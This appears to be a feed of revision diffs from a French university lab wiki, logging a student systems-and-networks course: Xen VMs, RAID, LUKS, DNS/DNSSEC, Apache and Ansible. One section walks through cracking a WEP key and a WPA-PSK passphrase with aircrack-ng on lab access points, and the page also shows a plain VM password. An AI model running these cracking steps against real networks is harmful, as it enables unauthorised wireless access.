Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==Ansible==&lt;br /&gt;
&lt;br /&gt;
Se connecter à notre VM pra-04&lt;br /&gt;
 xen console /etc/xen/pra-04.cfg&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.104&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
On ping sur notre zabeth pour savoir s'il communique bien ensemble&lt;br /&gt;
 ping 172.26.145.58&lt;br /&gt;
&lt;br /&gt;
On clone le git sur la zabeth puis on travaille dans le dossier&lt;br /&gt;
 git clone https://github.com/thomas-maurice/polytech-asr-lab.git&lt;br /&gt;
&lt;br /&gt;
On génère sur la zabeth une clé ssh&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;selim.bensalem@polytech-lille.net&amp;quot; -P ''&lt;br /&gt;
&lt;br /&gt;
Sur la zabeth, on rajoute au fichier authorized_keys la clé ssh précédemment créée et sur la VM, on crée un fichier authorized_keys avec la même clé&lt;br /&gt;
&lt;br /&gt;
On ajoute un role ssh_key&lt;br /&gt;
 - name: &amp;quot;Deploy ssh_keys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: authorized_keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: '0600&lt;br /&gt;
&lt;br /&gt;
On crée une template pour copier tous les clés dans authorized_keys de la VM&lt;br /&gt;
  % for ssh_key in ssh_keys%}&lt;br /&gt;
 {{ssh_key[&amp;quot;key&amp;quot;]}}&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
On lance ansible&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
==Consult==&lt;br /&gt;
&lt;br /&gt;
on installe consult et un container docker&lt;br /&gt;
 ---&lt;br /&gt;
 - name: &amp;quot;Create group&amp;quot;&lt;br /&gt;
   group:&lt;br /&gt;
     name: consul&lt;br /&gt;
     gid: 666&lt;br /&gt;
 - name: &amp;quot;Create user&amp;quot;&lt;br /&gt;
   user:&lt;br /&gt;
     name: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
     uid: 666&lt;br /&gt;
 - name: &amp;quot;Create /etc/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /etc/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Create /var/lib/consul&amp;quot;&lt;br /&gt;
   file:&lt;br /&gt;
     path: /var/lib/consul&lt;br /&gt;
     state: directory&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Client json&amp;quot;&lt;br /&gt;
   copy:&lt;br /&gt;
     src: consul.json&lt;br /&gt;
     dest: /etc/consul/consul.json&lt;br /&gt;
     owner: consul&lt;br /&gt;
     group: consul&lt;br /&gt;
 - name: &amp;quot;Start consul with container&amp;quot;&lt;br /&gt;
   docker_container:&lt;br /&gt;
     name: dockerConsul&lt;br /&gt;
     image: bitnami/consul&lt;br /&gt;
     volumes:&lt;br /&gt;
       - /etc/consul&lt;br /&gt;
     network_mode: host&lt;br /&gt;
     user: consul&lt;br /&gt;
     groups:&lt;br /&gt;
       - consul&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58041</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=58041"/>
				<updated>2022-01-12T13:12:45Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* ASR lab project */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;br /&gt;
&lt;br /&gt;
=Ferme de serveurs Web=&lt;br /&gt;
&lt;br /&gt;
==Ansible==&lt;br /&gt;
&lt;br /&gt;
Se connecter à notre VM pra-04&lt;br /&gt;
 xen console /etc/xen/pra-04.cfg&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/network/interfaces&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 172.26.145.104&lt;br /&gt;
 gateway 172.26.145.254&lt;br /&gt;
 netmask 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
On ping sur notre zabeth pour savoir s'il communique bien ensemble&lt;br /&gt;
 ping 172.26.145.58&lt;br /&gt;
&lt;br /&gt;
On clone le git sur la zabeth puis on travaille dans le dossier&lt;br /&gt;
 git clone https://github.com/thomas-maurice/polytech-asr-lab.git&lt;br /&gt;
&lt;br /&gt;
On génère sur la zabeth une clé ssh&lt;br /&gt;
 ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519 -C &amp;quot;selim.bensalem@polytech-lille.net&amp;quot; -P ''&lt;br /&gt;
&lt;br /&gt;
Sur la zabeth, on rajoute au fichier authorized_keys la clé ssh précédemment créée et sur la VM, on crée un fichier authorized_keys avec la même clé&lt;br /&gt;
&lt;br /&gt;
On ajoute un role ssh_key&lt;br /&gt;
 - name: &amp;quot;Deploy ssh_keys&amp;quot;&lt;br /&gt;
  template:&lt;br /&gt;
    src: authorized_keys.j2&lt;br /&gt;
    dest: /root/.ssh/authorized_keys&lt;br /&gt;
    owner: root&lt;br /&gt;
    group: root&lt;br /&gt;
    mode: '0600&lt;br /&gt;
&lt;br /&gt;
On crée une template pour copier tous les clés dans authorized_keys de la VM&lt;br /&gt;
  % for ssh_key in ssh_keys%}&lt;br /&gt;
 {{ssh_key[&amp;quot;key&amp;quot;]}}&lt;br /&gt;
 {% endfor %}&lt;br /&gt;
&lt;br /&gt;
On lance ansible&lt;br /&gt;
 ansible-playbook -v -i inventory polytech.yaml&lt;br /&gt;
&lt;br /&gt;
==Consult==&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57957</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57957"/>
				<updated>2022-01-12T11:54:20Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* ASR lab project */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
